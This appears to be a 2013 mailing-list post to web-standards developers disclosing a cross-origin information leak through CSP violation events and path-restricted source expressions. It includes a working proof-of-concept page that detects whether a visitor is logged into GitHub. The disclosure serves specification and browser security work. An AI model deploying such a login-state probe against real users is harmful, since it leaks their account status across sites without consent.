Cross-origin leakage with securitypolicyviolation events and paths in source expressions.

It appears that securitypolicyviolation events and paths in source
expressions are unintentionally useful for determining whether or not
redirects occur. For example, I can determine pretty trivially whether or
not a user is logged into GitHub with the following page in Chrome Canary
(with "Experimental WebKit Features" enabled):

  <!DOCTYPE html>
  <html>
  <head>
    <meta http-equiv="Content-Security-Policy" content="frame-src
https://github.com/notifications">
  </head>
  <body>
    <script>
      document.addEventListener('securitypolicyviolation', function (e) {
        console.log(e);
      });
      var frame = document.createElement('iframe');
      document.body.appendChild(frame);
      frame.src = 'https://github.com/notifications';
    </script>
  </body>
  </html>

I don't see a trivial mitigation; if we have paths, then detecting
violations with some granularity is possible already via the POSTed report.
The violation event simply makes reacting to such detection easier. :/

--
Mike West <mkwst@google.com>, Developer Advocate
Google Germany GmbH, Dienerstrasse 12, 80331 München, Germany
Google+: https://mkw.st/+, Twitter: @mikewest, Cell: +49 162 10 255 91

Received on Sunday, 5 May 2013 07:19:06 UTC